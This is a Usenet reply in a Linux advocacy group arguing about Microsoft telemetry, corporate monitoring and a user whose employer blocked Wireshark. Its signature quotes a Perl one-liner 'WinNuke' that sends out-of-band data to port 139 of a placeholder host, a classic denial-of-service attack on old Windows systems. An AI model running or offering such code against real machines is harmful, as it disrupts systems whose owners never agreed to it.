Sujet : Re: Ubuntu
De : OFeem1987 (at) *nospam* teleworm.us (Chris Ahlstrom)
Groupes : comp.os.linux.advocacyDate : 30. Nov 2024, 13:11:16
Autres entêtes
Organisation : None
Message-ID : <vievd5$1mmj5$4@dont-email.me>
References : 1 2 3 4 5 6 7 8 9 10 11 12 13 14 15 16
User-Agent : slrn/1.0.3 (Linux)
Stéphane CARPENTIER wrote this post while blinking in Morse code:
Le 29-11-2024, DFS <guhnoo-basher@linux.advocaca> a écrit :
On 11/28/2024 8:54 AM, shitv wrote:
>
Those wacky folks at Micro$oft consider spyware to be part of the
operating system.
>
How do you know they're spying on you?
>
What info are they collecting without your knowledge?
Try running Wireshark for awhile.
Putting spyware doesn't imply that they spy on you. They can give the
tools to others to spy on you. And the fact is: they do. I know an
adminsys who told me it's very impressive what an adminsys can know
about everything done by the users. A manager can ask an adminsys to
tell him anything someone did with his computer: it comes by default and
it is really easy to use.
I ran Wireshark at work once to try to figure out the Cisco crapware they used
to verify that the machine was "approved" (they supported Windows and OSX).
I saw it would be impossible to replicate on Linux.
Later, of course, the Company blacklisted Wireshark :-D
And trashed my Linux partition :-D :-D :-D
-- Winnuke in one line? No problem:perl -MIO::Socket -e 'IO::Socket::INET->new(PeerAddr=>"bad.dude.com:139")->send("bye",MSG_OOB)' And formatted so it's a little easier to read: #!/usr/bin/perl
use IO::Socket;
IO::Socket::INET
->new(PeerAddr=>"bad.dude.com:139")
->send("bye", MSG_OOB);
-- Randal Schwartz